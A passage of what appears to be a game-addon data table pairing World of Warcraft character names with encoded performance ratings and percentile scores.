["Onemorebeer"] = "CT:67/5%EB:675/92%EM:872/92%",
["Irongale"] = "UT:40/45%EB:409/83%RM:646/74%",
["Govent"] = "UT:388/48%EB:362/78%EM:553/87%",
["Oopz"] = "UT:111/36%UB:313/45%RM:300/65%",
["Littlelovely"] = "CT:203/24%UB:41/33%RM:584/64%",
["Peyotl"] = "ET:352/84%LB:623/96%RM:252/60%",
["Noeht"] = "UT:251/31%RB:451/66%UM:426/48%",
["Typicaluwu"] = "UT:268/37%LB:779/98%LM:953/97%",
["Boprattle"] = "RT:430/57%RB:472/68%RM:547/60%",
["Oberoth"] = "UT:51/48%EB:349/75%RM:361/71%",
["Adrelen"] = "CT:61/19%UB:245/31%RM:629/69%",
["Moöoónfire"] = "RT:473/62%RB:498/71%UM:148/47%",
["Beastwar"] = "ET:653/90%EB:479/81%CM:10/6%",
["Eheh"] = "UT:23/25%RB:359/66%RM:411/65%",
["Nbshaman"] = "CT:171/19%CB:149/16%CM:215/20%",
["Xhanatoz"] = "UT:33/39%RB:244/60%RM:278/63%",
["Rowscina"] = "CT:102/11%UB:133/32%UM:290/34%",
["Gildian"] = "CT:51/12%UB:273/36%RM:423/50%",
["Buffykitten"] = "UT:254/35%RB:378/55%RM:491/59%",
["Ztbugatti"] = "RT:205/65%RB:454/62%EM:717/81%",
["Ragnell"] = "ET:625/92%EB:603/86%LM:878/98%",
["Milkdonald"] = "CT:37/2%RB:477/66%EM:800/86%",
["Totempull"] = "RT:278/74%EB:356/77%EM:510/84%",
["Missriver"] = "UT:327/40%RB:243/57%RM:341/69%",
["Murpheezlaw"] = "RT:214/66%EB:549/78%RM:545/61%",
["Tarison"] = "UT:19/26%RB:245/60%RM:598/69%",
["Vyajr"] = "ET:643/93%EB:697/93%EM:781/89%",
["Palapocket"] = "UT:290/35%EB:450/86%CM:69/24%",
["Innervatheon"] = "RT:519/68%EB:342/75%RM:613/71%",
["Ninez"] = "UT:82/25%RM:205/53%",
["Pelor"] = "CT:55/4%UB:198/48%CM:149/17%",
["Shatsbassoon"] = "ET:267/76%RB:511/73%UM:146/48%",
["Tssbb"] = "UT:136/47%EB:343/75%EM:730/82%",
["Cuomo"] = "ET:280/78%RB:297/68%RM:549/61%",
["Twpatient"] = "CT:8/11%CB:184/21%CM:123/17%",
["Lebeouf"] = "RT:191/61%EB:563/79%EM:756/84%",
["Floschick"] = "ET:598/75%EB:591/83%EM:730/81%",
["Sandrena"] = "RT:213/63%RB:457/63%RM:522/57%",
["Absolutiøn"] = "UT:359/44%RB:435/61%RM:620/71%",
["Prybzll"] = "RT:568/74%RB:369/52%EM:740/77%",
["Miitsuri"] = "ET:662/83%RB:496/71%RM:258/63%",
["Pretzelday"] = "UT:99/31%CB:186/22%CM:105/11%",
["Saljjak"] = "CT:168/23%RB:262/62%RM:487/58%",
["Erichmoo"] = "CT:69/20%UB:207/26%EM:623/84%",
["Discpriest"] = "RB:422/57%UM:380/40%",
["Beesneaky"] = "ET:705/90%EB:721/91%EM:820/86%",
["Hamburlgarr"] = "LT:595/98%EB:724/92%EM:828/85%",
["Ltyvslzy"] = "ET:706/91%SB:755/99%LM:777/95%",
["Rigrit"] = "ET:699/90%SB:795/99%SM:912/99%",
["Crackedsmoke"] = "RT:543/71%EB:657/85%EM:842/87%",
["Phatsamurai"] = "RT:497/67%EB:633/82%EM:831/91%",
["Plumshizzle"] = "ET:566/82%LB:738/95%LM:944/97%",
["Barcabear"] = "ET:718/92%EB:594/93%EM:874/90%",
["Nohbdy"] = "ET:437/94%EB:656/85%EM:789/82%",
["Wetlander"] = "SB:813/99%SM:1010/99%",
["Forgotpoison"] = "EB:699/89%EM:770/80%",
["Uncaring"] = "ET:410/94%EB:710/89%LM:806/96%",
["Acetate"] = "ET:364/91%EB:688/88%EM:765/81%",
["Disendra"] = "LT:756/96%LB:776/97%EM:707/94%",
["Dlt"] = "RT:559/74%EB:688/88%EM:917/94%",
["Lurs"] = "ST:831/99%SB:810/99%LM:825/97%",
["Yakesuo"] = "LT:498/96%EB:732/92%RM:640/68%",
["Groundstrike"] = "LT:592/98%LB:768/96%EM:885/92%",
["Micks"] = "ET:289/85%EB:548/90%EM:822/87%",
["Oil"] = "EB:749/94%EM:917/94%",
["Oldbone"] = "ET:670/86%EB:718/91%EM:750/93%",
["Revz"] = "ET:299/84%EB:742/93%LM:974/98%",
["Mcdagger"] = "EB:708/89%EM:881/90%",
["Magg"] = "ET:242/75%EB:673/85%EM:888/88%",
["Peekabooze"] = "UT:116/42%EB:747/94%EM:876/90%",
["Tánkandspank"] = "ET:280/84%EB:653/82%EM:432/77%",
["Shengar"] = "ET:660/86%LB:791/98%RM:641/68%",
["Warkremm"] = "UT:326/46%EB:657/84%EM:560/75%",
["Dalashton"] = "ET:625/82%EB:718/91%EM:869/91%",
["Chilipimp"] = "ET:331/89%EB:707/90%EM:892/92%",
["Rolla"] = "LT:748/96%SB:801/99%SM:920/99%",
["Stogan"] = "ET:360/90%EB:681/87%EM:759/80%",
["Rootsloot"] = "LT:710/97%LB:753/98%SM:1001/99%",
["Floppycox"] = "UT:261/38%EB:631/82%RM:536/61%",
["Chapper"] = "RT:428/59%EB:644/83%EM:817/79%",
["Tasleem"] = "RT:206/70%EB:722/91%EM:875/90%",
["Oqu"] = "CT:68/24%EB:744/93%EM:856/88%",
["Heyphonelay"] = "ET:720/92%LB:759/96%LM:945/96%",
["Szix"] = "RT:479/66%SB:809/99%LM:988/98%",
["Sevastra"] = "ET:713/92%LB:758/96%LM:763/95%",
["Eviscercutie"] = "ET:677/87%EB:621/81%RM:608/65%",
["Wooziie"] = "ET:273/81%LB:758/95%EM:882/90%",
["Danali"] = "ET:731/93%SB:867/99%SM:1024/99%",
["Benzz"] = "ET:597/80%EB:743/93%EM:889/91%",
["Grokzar"] = "ET:357/91%EB:735/93%LM:920/95%",
["Marvie"] = "ET:651/85%EB:705/89%LM:949/96%",
["Shysie"] = "ST:724/99%LB:705/97%LM:963/96%",
["Nioxic"] = "RT:520/69%EB:709/89%EM:879/90%",
["Icyhoty"] = "ET:730/94%LB:770/97%LM:974/98%",
["Nieth"] = "LT:700/97%SB:802/99%LM:905/97%",
["Jimini"] = "ET:690/88%EB:744/94%EM:902/93%",
["Mistaa"] = "UT:318/41%EB:601/94%EM:749/78%",
["Elsaiean"] = "ET:595/79%EB:691/88%EM:737/80%",
["Rotheart"] = "LT:763/97%SB:824/99%LM:973/97%",
["Staples"] = "ST:793/99%LB:790/98%SM:1016/99%",
["Chez"] = "ET:588/79%EB:681/86%EM:848/88%",
["Threatsimp"] = "ET:737/94%SB:778/99%LM:970/98%",
["Vulcan"] = "ET:680/88%EB:489/86%LM:934/96%",
["Soleil"] = "RT:291/72%EB:524/80%EM:580/89%",
["Kakster"] = "CT:92/9%UB:258/34%UM:442/48%",
["Canasha"] = "LT:673/98%EB:536/77%EM:822/87%",
["Jöhn"] = "RT:406/51%EB:546/78%EM:727/79%",
["Limon"] = "RT:191/58%RB:414/59%RM:619/68%",
["Trugore"] = "RB:408/58%EM:690/76%",
["Gaspar"] = "RT:204/61%EB:543/78%EM:713/78%",
["Pnda"] = "CT:82/8%EB:567/80%RM:353/54%",
["Electrodeth"] = "LT:488/95%EB:655/91%EM:542/86%",
["Aquilae"] = "ET:713/88%LB:751/97%LM:942/97%",
["Swishers"] = "RT:447/56%EB:436/85%RM:332/60%",
["Sparqie"] = "EB:463/88%EM:789/86%",
["Eclessia"] = "LT:527/96%EB:595/82%RM:602/66%",
["Winni"] = "UT:118/37%EB:559/78%EM:691/76%",
["Jackdru"] = "RT:429/57%EB:370/78%EM:817/85%",
["Reminosk"] = "EB:663/90%EM:869/93%",
["Sixpackchad"] = "RB:289/70%EM:688/76%",
["Bubblebutt"] = "EB:570/80%RM:617/70%",
["Zonnah"] = "UT:116/39%RB:289/64%RM:623/66%",
["Stilettoheal"] = "CT:30/1%UB:180/44%UM:199/49%",
["Shiftyx"] = "RT:426/64%SB:780/99%LM:947/97%",
["Bhellîom"] = "EB:645/89%LM:925/96%",
["Spoopypriest"] = "CT:151/17%RB:382/54%EM:685/75%",
["Fluffboy"] = "CT:34/1%EB:621/86%UM:437/47%",
["Liltotemz"] = "ET:350/84%EB:465/88%RM:623/72%",
["Upewmeheal"] = "UT:323/39%EB:397/82%RM:546/64%",
["Badpriest"] = "LB:715/95%LM:902/95%",
["Aurasing"] = "UT:352/46%EB:565/80%EM:697/77%",
["Choná"] = "RT:263/73%EB:536/77%EM:810/90%",
["Healward"] = "EB:690/93%LM:925/96%",
["Trollsu"] = "EB:587/82%EM:734/80%",
["Ayeesha"] = "UT:41/36%EB:665/90%EM:882/93%",
["Rurii"] = "RT:529/67%EB:619/86%EM:786/85%",
["Narang"] = "RT:398/50%RB:492/70%EM:864/93%",
["Olmanon"] = "UB:328/45%EM:807/90%",
["Yomrpriest"] = "CT:77/7%RB:334/73%RM:551/65%",
["Fearwardyou"] = "UT:307/37%RB:513/74%EM:800/89%",
["Topp"] = "UT:278/34%EB:404/82%EM:722/83%",
["Marez"] = "CT:54/16%EB:704/94%EM:841/89%",
["Anxiety"] = "UT:113/35%EB:578/80%EM:895/94%",
["Kerm"] = "RT:524/67%EB:532/76%EM:845/91%",
["Urshak"] = "ET:617/77%EB:646/90%EM:704/85%",
["Steh"] = "EB:482/89%RM:519/61%",
["Kraunic"] = "EB:436/85%EM:881/93%",
["Anitya"] = "RT:491/62%RB:508/73%EM:818/91%",
["Provisioner"] = "RB:402/57%UM:156/41%",
["Gorgeous"] = "CT:152/17%RB:210/51%CM:25/5%",
["Loden"] = "EB:709/94%EM:792/85%",
["Fewmay"] = "LT:768/97%SB:805/99%SM:930/99%",
["Vindication"] = "ET:721/93%LB:776/97%LM:987/98%",
["Dortte"] = "ET:670/88%RB:326/72%EM:735/83%",
["Deaminase"] = "ST:759/99%LB:797/98%SM:1006/99%",
["Geetor"] = "ET:682/89%EB:411/83%RM:514/64%",
["Goochi"] = "LT:759/96%SB:792/99%LM:965/98%",
["Dazed"] = "ET:718/92%LB:759/96%LM:964/98%",
["Necrotik"] = "ET:697/90%SB:768/99%LM:889/98%",
["Cuobscene"] = "ET:705/90%EB:610/80%EM:702/91%",
["Rastymcnasty"] = "ET:624/83%EB:738/94%LM:790/97%",
["Phyz"] = "ET:420/94%LB:764/98%LM:816/98%",
["Khaidine"] = "LT:772/97%LB:756/95%LM:955/97%",
["Ranidnav"] = "ST:796/99%SB:780/99%LM:959/97%",
["Khabarakh"] = "LT:765/96%LB:775/97%LM:964/98%",
["Supreem"] = "RT:555/74%EB:575/81%EM:764/82%",
["Liltal"] = "ET:731/94%LB:761/96%LM:923/96%",
["Drgreeni"] = "ET:676/88%LB:750/95%EM:841/89%",
["Riejj"] = "RT:532/71%EB:630/87%EM:754/86%",
["Khaas"] = "RT:498/68%LB:653/96%",
["Borron"] = "ET:589/79%EB:531/89%EM:624/89%",
["Yaboyfireboy"] = "LT:767/97%LB:762/96%LM:961/97%",
["Kiran"] = "ET:680/91%LB:664/97%EM:882/94%",
["Dragondog"] = "ET:684/89%EB:735/93%EM:894/93%",
["Naia"] = "ST:819/99%SB:815/99%LM:959/97%",
["Littlepurp"] = "LT:784/98%SB:806/99%LM:927/95%",
["Stigma"] = "LT:748/95%LB:794/98%SM:997/99%",
["Charlot"] = "ET:339/88%EB:525/89%EM:822/85%",
["Illucia"] = "LT:586/98%LB:773/97%LM:969/97%",
["Whitecloudy"] = "ET:568/76%EB:614/85%EM:832/92%",
["Oyasuumi"] = "LT:652/98%LB:776/97%EM:789/83%",
["Googlie"] = "ET:691/90%EB:630/86%EM:831/88%",
["Flidais"] = "LT:769/97%SB:796/99%LM:858/97%",
["Thething"] = "LT:756/96%LB:783/98%LM:950/96%",
["Daddycyrus"] = "LT:758/96%LB:776/97%EM:918/94%",
["Wapwap"] = "ET:715/92%LB:739/98%EM:798/85%",
["Jaguar"] = "ET:443/94%EB:616/94%EM:920/93%",
["Bobbybooshey"] = "ET:331/88%LB:637/97%EM:740/84%",
["Yoonhee"] = "ET:713/92%EB:685/87%SM:998/99%",
["Copskill"] = "ET:618/80%EB:706/89%EM:824/85%",
["Greedytea"] = "ET:386/92%EB:703/93%EM:861/93%",
["Sulfur"] = "ST:807/99%SB:803/99%SM:987/99%",
["Daystarz"] = "LT:770/97%SB:775/99%LM:881/98%",
["Rozzy"] = "ET:636/84%EB:442/82%EM:701/77%",
["Linistroni"] = "RT:178/63%SB:806/99%LM:1001/98%",
["Krzkilla"] = "LT:775/97%SB:802/99%LM:960/97%",
["Nirowr"] = "LT:788/98%SB:809/99%SM:998/99%",
["Cupz"] = "AT:877/100%SB:893/99%SM:1116/99%",
["Funpee"] = "ET:701/91%LB:733/96%LM:930/95%",
["Magicmommy"] = "ET:273/82%LB:733/95%EM:817/87%",
["Reânimated"] = "ET:578/77%EB:548/94%EM:749/85%",
["Killmcpickle"] = "ST:818/99%LB:771/97%LM:940/97%",
["Konpakuyoumu"] = "ET:738/94%LB:658/96%EM:692/76%",
["Aryax"] = "LT:778/98%LB:771/97%LM:979/98%",
["Scandal"] = "ET:650/85%EB:711/91%LM:924/95%",
["Xiaokelai"] = "LT:766/97%LB:755/95%LM:952/96%",
["Gírlgamer"] = "ET:309/85%EB:736/92%EM:927/94%",
["Ypling"] = "ET:612/81%SB:720/99%EM:601/92%",
["Radii"] = "ET:428/94%LB:723/95%EM:661/93%",
["Dakkota"] = "LT:757/96%LB:794/98%SM:998/99%",
["Aceholyflame"] = "ET:347/90%EB:733/93%LM:943/96%",
["Frontend"] = "ET:629/84%LB:768/97%EM:896/93%",
["Corruption"] = "ST:762/99%LB:788/98%LM:968/97%",
["Singularity"] = "LT:749/95%LB:753/95%LM:937/95%",
["Zathx"] = "LT:761/96%LB:759/96%LM:934/96%",
["Cocainexanax"] = "ET:718/93%LB:779/97%EM:810/84%",
["Bacca"] = "UT:367/46%RB:364/52%EM:459/80%",
["Matea"] = "CT:168/19%EB:648/89%EM:793/86%",
["Meteorman"] = "UT:250/31%RB:436/64%UM:132/40%",
["Cityofruin"] = "UT:314/38%RB:383/55%EM:678/77%",
["Dirtnapz"] = "UT:25/33%RB:140/52%EM:829/92%",
["Online"] = "ET:438/92%EB:593/83%RM:229/64%",
["Guccigød"] = "RT:260/73%EB:416/85%RM:199/52%",
["Thundo"] = "CT:76/24%UB:298/42%RM:346/71%",
["Karmasuture"] = "UT:325/45%RB:239/59%EM:659/77%",
["Zhoêy"] = "CT:60/4%CB:77/17%",
["Shamwowbread"] = "UT:107/35%UB:291/41%EM:597/89%",
["Blowmywhat"] = "RT:396/64%EB:621/92%UM:389/46%",
["Marazer"] = "RT:216/65%EB:583/80%EM:726/79%",
["Wattahulk"] = "CT:198/23%UB:114/29%CM:97/8%",
["Sunnight"] = "CT:149/20%UB:109/29%UM:402/48%",
["Clothless"] = "CT:7/1%RB:381/54%RM:549/60%",
["Vilaran"] = "CT:13/2%UB:170/40%RM:678/72%",
["Spiritsheep"] = "RT:171/58%EB:517/82%EM:686/82%",
["Hashipotato"] = "RT:133/58%UB:106/40%RM:462/54%",
["Tacobelle"] = "CT:41/3%RM:372/64%",
["Kairyuu"] = "UB:230/29%UM:338/39%",
["Mascota"] = "RT:505/66%EB:526/75%RM:554/65%",
["Bourbonwolf"] = "RT:242/69%UB:195/49%EM:406/76%",
["Ezover"] = "UT:252/30%RB:448/64%RM:602/69%",
["Gangbenger"] = "CT:63/5%CB:89/8%CM:55/4%",
["Tactx"] = "ET:572/87%EB:608/88%LM:728/95%",
["Razr"] = "RT:244/72%EB:389/81%EM:711/78%",
["Dobbly"] = "UT:141/49%RB:427/61%RM:259/64%",
["Slimjadey"] = "UT:140/49%RB:351/50%RM:277/65%",
["Coensdruid"] = "UT:252/33%RB:381/54%EM:687/76%",
["Juggily"] = "ET:642/80%EB:564/80%RM:577/67%",
["Stubbypoo"] = "RT:478/59%EB:421/84%RM:641/73%",
["Rylen"] = "UT:109/39%RB:274/64%CM:20/11%",
["Bustdownjeje"] = "CT:121/17%RB:376/53%EM:749/82%",
["Andydalton"] = "RT:307/73%EB:195/75%EM:510/86%",
["Fckndsgustin"] = "UT:46/49%EB:375/79%RM:195/52%",
["Ezida"] = "LT:770/98%SB:777/99%SM:981/99%",
["Thedeathnote"] = "CT:25/0%CB:110/11%RM:283/66%",
["Edriennia"] = "CT:63/22%RB:433/63%RM:280/66%",
["Blìtz"] = "CT:4/0%CB:29/0%",
["Dtla"] = "LT:706/96%LB:759/98%LM:944/98%",
["Zaumi"] = "ET:280/87%EB:566/87%EM:815/93%",
["Lfr"] = "RT:196/60%RB:425/72%UM:30/32%",
["Cimor"] = "CM:63/4%",
["Tunacow"] = "RT:217/71%RB:291/62%RM:453/53%",
["Iololsham"] = "CT:12/0%EB:480/89%RM:229/56%",
["Yobobear"] = "ST:801/99%SB:825/99%SM:970/99%",
["Gbot"] = "ET:543/86%EB:705/93%EM:822/91%",
["Dafoogler"] = "LT:725/96%LB:761/98%LM:965/98%",
["Doofer"] = "ET:633/91%LB:663/97%EM:792/89%",
["Huahuaniu"] = "LT:731/96%LB:689/98%EM:713/86%",
["Styleen"] = "ET:436/82%EB:412/92%SM:920/99%",
["Soyra"] = "LT:755/98%SB:779/99%SM:978/99%",
["Thehangover"] = "LT:760/98%SB:770/99%LM:945/98%",
["Timmywow"] = "ET:399/77%EB:485/89%EM:720/83%",
["Gàmbit"] = "ET:681/88%LB:756/95%EM:658/91%",
["Boatss"] = "LT:546/96%EB:450/86%EM:698/84%",
["Kirnx"] = "ET:515/84%EB:586/94%EM:725/86%",
["Aeronomatron"] = "LT:470/96%LB:735/97%LM:864/95%",
["Stafoo"] = "ET:568/87%EB:595/86%EM:752/87%",
["Philipsm"] = "ET:546/87%LB:636/96%EM:760/88%",
["Rottenvagene"] = "ET:414/76%LB:761/98%LM:932/97%",
["Admiree"] = "CB:37/1%",
["Brenner"] = "ET:512/85%EB:604/83%EM:792/85%",
["Snoopypriest"] = "ET:540/85%LB:743/96%LM:953/98%",
["Sfvog"] = "ET:515/83%LB:744/96%EM:855/92%",
["Pennsylhojya"] = "ET:583/92%SB:614/99%LM:893/98%",
["Maybeatank"] = "LT:508/96%EB:665/85%EM:513/83%",
["Paynekiller"] = "RT:162/59%LB:688/97%LM:779/95%",
["Hackr"] = "LT:620/98%LB:655/96%EM:876/90%",
["Chuunin"] = "ET:318/86%LB:756/95%EM:894/91%",
["Fooliojones"] = "ET:629/83%EB:608/94%RM:664/73%",
["Gallo"] = "UT:224/32%EB:702/88%EM:838/87%",
["Vestera"] = "LT:560/97%EB:716/90%EM:770/80%",
["Cedr"] = "LT:522/97%EB:569/91%EM:871/90%",
["Korteh"] = "ST:792/99%SB:811/99%LM:984/98%",
["Janedough"] = "LB:777/97%LM:988/98%",
["Yip"] = "ET:632/88%EB:600/93%LM:931/95%",
["Captrixx"] = "ET:341/90%EB:704/89%EM:679/91%",
["Disney"] = "RT:516/68%EB:449/82%RM:418/73%",
["Bagmeharder"] = "EB:598/78%RM:631/70%",
["Sonpihs"] = "ET:652/84%EB:644/83%EM:552/83%",
["Tiptap"] = "ET:631/82%LB:762/96%LM:963/97%",
["Marillyn"] = "ET:344/89%EB:724/91%EM:843/87%",
["Warble"] = "ET:351/91%EB:709/89%EM:811/84%",
["Bananamana"] = "EB:684/87%RM:640/70%",
["Instaq"] = "ET:327/89%EB:716/91%EM:817/87%",
["Gankstá"] = "EB:692/87%RM:319/64%",
["Togachimp"] = "LT:740/98%LB:763/98%LM:934/98%",
["Gavin"] = "RT:193/65%EB:701/88%EM:890/91%",
["Hakujou"] = "RT:479/63%EB:708/90%EM:895/92%",
["Stacylet"] = "UT:118/42%EB:704/89%EM:927/94%",
["Yssimarogue"] = "ET:654/84%EB:682/87%EM:889/91%",
["Gentlehyenas"] = "RT:418/57%EB:610/79%EM:497/82%",
["Beniz"] = "ET:695/90%EB:587/92%LM:925/95%",
["Nøxx"] = "RT:554/74%EB:562/91%RM:390/73%",
["Sagnasty"] = "ET:634/83%EB:627/81%EM:721/79%",
["Dulong"] = "RT:468/64%LB:708/97%EM:734/94%",
["Wormed"] = "ET:587/77%EB:678/87%EM:822/85%",
["Curdle"] = "ET:708/91%LB:740/98%SM:1000/99%",
["Bagler"] = "ET:593/77%EB:610/94%EM:887/90%",
["Scrum"] = "RT:424/56%LB:770/96%EM:882/91%",
["Evilution"] = "UT:90/35%SB:808/99%SM:998/99%",
["Dizzmarz"] = "CT:68/24%EB:572/76%EM:770/81%",
["Paint"] = "ET:672/87%EB:731/92%LM:926/96%",
["Simplejacked"] = "LT:782/98%SB:798/99%SM:982/99%",
["Redkiller"] = "LT:520/97%EB:712/93%EM:823/91%",
["Pigalone"] = "ET:718/92%LB:751/95%EM:860/89%",
["Berrylove"] = "ST:819/99%SB:837/99%SM:1029/99%",
["Krip"] = "ET:650/84%EB:561/91%EM:737/78%",
["Loiski"] = "ET:566/76%LB:774/97%EM:639/90%",
["Jackcoat"] = "RT:195/65%EB:714/90%EM:756/79%",
["Ninjaly"] = "EB:614/80%RM:211/50%",
["Schwzrd"] = "LT:754/96%LB:769/98%LM:918/97%",
["Instyle"] = "ET:687/88%EB:639/83%EM:696/75%",
["Flanker"] = "RT:456/60%LB:766/96%LM:951/96%",
["Ahanrog"] = "RT:514/67%EB:703/89%RM:669/71%",
["Siegetanky"] = "UT:108/42%EB:618/80%EM:732/80%",
["Molecule"] = "RT:436/57%EB:751/94%EM:852/87%",
["Headdis"] = "ET:581/76%EB:683/87%EM:834/87%",
["Slowtrain"] = "ET:687/89%LB:794/98%SM:1022/99%",
["Weedwormwill"] = "LT:758/96%LB:778/98%LM:985/98%",
["Tonyonesavge"] = "ET:413/94%LB:705/97%LM:916/95%",
["Gabbagool"] = "ET:585/76%EB:712/89%EM:877/90%",
["Pikachewbaca"] = "LT:509/97%EB:702/88%LM:956/97%",
["Neoly"] = "RT:500/66%SB:769/99%SM:896/99%",
["Lilbald"] = "LT:780/98%LB:787/98%LM:916/95%",
["Mln"] = "ET:580/77%LB:739/98%EM:748/94%",
["Vulfx"] = "ET:743/94%SB:803/99%SM:1002/99%",
["Bigpòps"] = "ET:620/82%EB:669/85%EM:818/87%",
["Lathspell"] = "LT:575/97%EB:748/94%EM:859/88%",
["Mercules"] = "ET:237/76%EB:657/84%LM:963/96%",
["Aimed"] = "ST:792/99%SB:825/99%SM:1003/99%",
["Fraveh"] = "EB:650/84%EM:716/76%",
["Pummper"] = "EB:705/89%EM:802/84%",
["Ralak"] = "ET:282/75%EB:686/92%UM:155/45%",
["Doomhand"] = "EB:587/84%EM:708/84%",
["Tayy"] = "ET:297/80%EB:653/89%EM:851/92%",
["Vsco"] = "RB:393/55%RM:580/64%",
["Wororg"] = "UT:141/47%EB:639/87%EM:816/87%",
["Bigshoulders"] = "UT:105/33%RB:425/58%EM:783/84%",
["Fwappy"] = "EB:442/77%EM:699/86%",
["Greenfinger"] = "RT:169/51%RB:479/69%UM:191/48%",
["Convertibull"] = "ET:398/91%EB:452/86%EM:739/80%",
["Dalnym"] = "UT:152/47%EB:626/86%EM:876/93%",
["Areum"] = "RT:246/70%RB:320/70%EM:802/87%",
["Gailslight"] = "RT:172/53%RB:458/65%RM:611/67%",
["Mogul"] = "RT:256/74%EB:573/79%EM:718/76%",
["Ramröd"] = "RT:278/74%EB:470/88%UM:425/46%",
["Drquack"] = "CT:78/7%RB:468/64%EM:710/78%",
["Healyx"] = "EB:548/76%EM:761/83%",
["Rippies"] = "RT:245/69%RB:387/54%RM:254/57%",
["Agiao"] = "UT:317/39%RB:527/73%RM:626/73%",
["Powermove"] = "UT:91/28%EB:365/78%EM:754/88%",
["Zanbar"] = "RB:441/63%EM:712/78%",
["Shamaniganss"] = "EB:678/90%EM:851/89%",
["Daxin"] = "UB:305/42%RM:622/69%",
["Reignman"] = "RB:445/61%EM:695/76%",
["Thicthighz"] = "UT:138/44%EB:632/87%EM:881/93%",
["Powerworddie"] = "RT:209/62%EB:471/88%EM:881/93%",
["Show"] = "RB:447/65%RM:563/66%",
["Khupo"] = "ET:393/91%EB:636/87%EM:753/84%",
["Underless"] = "CT:46/12%RB:435/60%EM:750/81%",
["Viciousness"] = "ET:655/81%LB:600/96%LM:737/95%",
["Coxy"] = "LT:593/97%EB:643/88%EM:782/84%",
["Zapato"] = "RB:354/50%UM:126/36%",
["Catchaheal"] = "CT:143/16%RB:482/69%RM:553/61%",
["Applesauce"] = "EB:636/87%EM:720/78%",
["Adrestia"] = "CT:101/10%RB:295/67%RM:479/52%",
["Treren"] = "ET:690/87%EB:647/89%EM:824/91%",
["Gantalore"] = "RB:336/71%EM:748/81%",
["Therealbavie"] = "CT:76/22%EB:610/86%EM:745/87%",
["Réiss"] = "LT:540/97%LB:727/95%EM:877/92%",
["Shadowflay"] = "RB:398/57%EM:658/76%",
["Huglargerleg"] = "ET:609/78%EB:489/90%EM:881/93%",
["Millerguy"] = "UB:267/36%UM:253/29%",
["Clubrat"] = "RT:176/57%EB:657/90%RM:527/61%",
["Ironboxy"] = "RT:506/65%EB:672/92%EM:741/83%",
["Misdiagnose"] = "UB:330/45%RM:561/61%",
["Buckram"] = "CT:167/19%EB:620/86%UM:249/25%",
["Laozei"] = "ET:712/91%LB:688/97%EM:809/79%",
["Stabbyqt"] = "ET:725/92%EB:630/82%RM:699/74%",
["Vaelyth"] = "ET:665/86%EB:731/92%EM:878/91%",
["Kraetos"] = "ET:711/92%EB:714/94%LM:936/96%",
["Herbthief"] = "LT:768/97%LB:756/97%RM:606/73%",
["Rogerknome"] = "ET:633/84%LB:775/98%SM:1005/99%",
["Rofa"] = "ET:273/81%EB:522/75%RM:618/74%",
["Roundup"] = "ET:625/83%EB:632/82%EM:701/75%",
["Denebola"] = "ET:743/94%EB:713/90%EM:797/83%",
["Snydicate"] = "LT:781/98%SB:804/99%LM:960/98%",
["Dylano"] = "LT:458/95%LB:580/95%LM:933/95%",
["Unclestiff"] = "LT:753/96%LB:773/97%EM:908/94%",
["Dejavoo"] = "ET:722/93%LB:743/96%EM:881/92%",
["Spam"] = "LT:762/96%EB:739/93%EM:894/91%",
["Dipressed"] = "ET:652/85%EB:590/77%RM:584/66%",
["Nakaruru"] = "ET:683/89%EB:546/93%EM:696/94%",
["Kalticus"] = "ET:564/76%LB:778/97%LM:974/98%",
["Manauser"] = "ET:723/93%SB:743/99%EM:828/92%",
["Getsmithered"] = "ET:540/81%LB:787/98%LM:977/98%",
["Paybàck"] = "LT:762/96%SB:801/99%LM:986/98%",
["Yobábásbábá"] = "LT:777/98%LB:611/97%EM:874/94%",
["Vn"] = "LT:752/96%LB:781/98%LM:811/96%",
["Blazex"] = "LT:777/98%SB:826/99%LM:935/98%",
["Samsiusts"] = "LT:669/98%LB:580/95%LM:965/97%",
["Tenjin"] = "ET:727/93%LB:683/98%LM:736/96%",
["Mageharry"] = "ET:720/93%LB:794/98%LM:976/98%",
["Brendozer"] = "ET:656/86%EB:664/86%LM:936/96%",
["Zosimos"] = "ST:788/99%SB:770/99%LM:935/96%",
["Bildock"] = "LT:762/96%LB:662/96%SM:989/99%",
["Flaazun"] = "ET:722/93%LB:755/95%LM:962/97%",
["Showji"] = "ET:366/92%EB:513/92%EM:891/92%",
["Coreo"] = "LT:779/98%LB:770/97%EM:910/92%",
["Omgkittens"] = "ET:441/94%EB:705/94%LM:813/97%",
["Arkon"] = "ET:701/91%LB:761/96%LM:981/98%",
["Maa"] = "ET:634/84%EB:652/85%EM:833/88%",
["Votelock"] = "LT:760/96%EB:542/90%EM:841/87%",
["Gromhell"] = "ET:611/81%EB:573/92%EM:652/90%",
["Pier"] = "LT:769/97%LB:709/98%LM:957/97%",
["Blasterbae"] = "LT:760/96%LB:674/97%EM:890/91%",
["Jaldy"] = "ET:573/77%EB:680/86%EM:828/86%",
["Blasterbro"] = "RT:467/65%EB:620/81%RM:613/69%",
["Kryes"] = "LT:778/98%SB:802/99%LM:936/96%",
["Manatus"] = "ET:619/82%LB:771/97%EM:908/94%",
["Cultumnox"] = "ET:679/89%LB:776/97%LM:996/98%",
["Fekeff"] = "ET:732/94%EB:738/94%EM:838/88%",
["Diamondhands"] = "ET:662/86%EB:535/89%EM:825/88%",
["Vforce"] = "ET:737/94%EB:682/91%EM:463/82%",
["Tommyknocker"] = "ET:380/92%LB:649/97%LM:965/97%",
["Reagana"] = "LT:758/96%LB:675/98%EM:920/94%",
["Asharial"] = "ET:738/94%LB:713/98%EM:893/92%",
["Carollie"] = "ET:674/88%EB:735/93%LM:950/96%",
["Frostycrittz"] = "ET:410/93%LB:770/97%LM:699/95%",
["Powermountie"] = "ST:751/99%SB:766/99%LM:858/97%",
["Noogler"] = "ET:628/83%EB:486/89%EM:809/86%",
["Lome"] = "ET:701/90%EB:705/92%LM:869/95%",
["Finalé"] = "LT:787/98%SB:785/99%LM:885/98%",
["Anysummoners"] = "ET:726/93%EB:705/90%EM:893/93%",
["Villaina"] = "ST:795/99%LB:774/97%LM:964/98%",
["Narsofer"] = "LT:771/97%LB:784/98%LM:964/98%",
["Sunney"] = "ET:703/91%EB:674/86%EM:735/78%",
["Capunisher"] = "RT:554/74%EB:690/92%EM:721/82%",
["Rahladahla"] = "ET:639/84%EB:544/93%EM:896/93%",
["Projektred"] = "ET:279/81%EB:405/78%EM:790/76%",
["Nikoo"] = "RT:540/73%LB:779/97%EM:804/83%",
["Zenyatta"] = "LT:560/97%EB:442/86%EM:833/91%",
["Fenrîr"] = "LT:750/97%LB:770/98%LM:895/96%",
["Ddfruitqaq"] = "RT:364/70%LB:726/95%LM:925/97%",
["Mahasiah"] = "RT:131/54%RB:206/58%RM:474/56%",
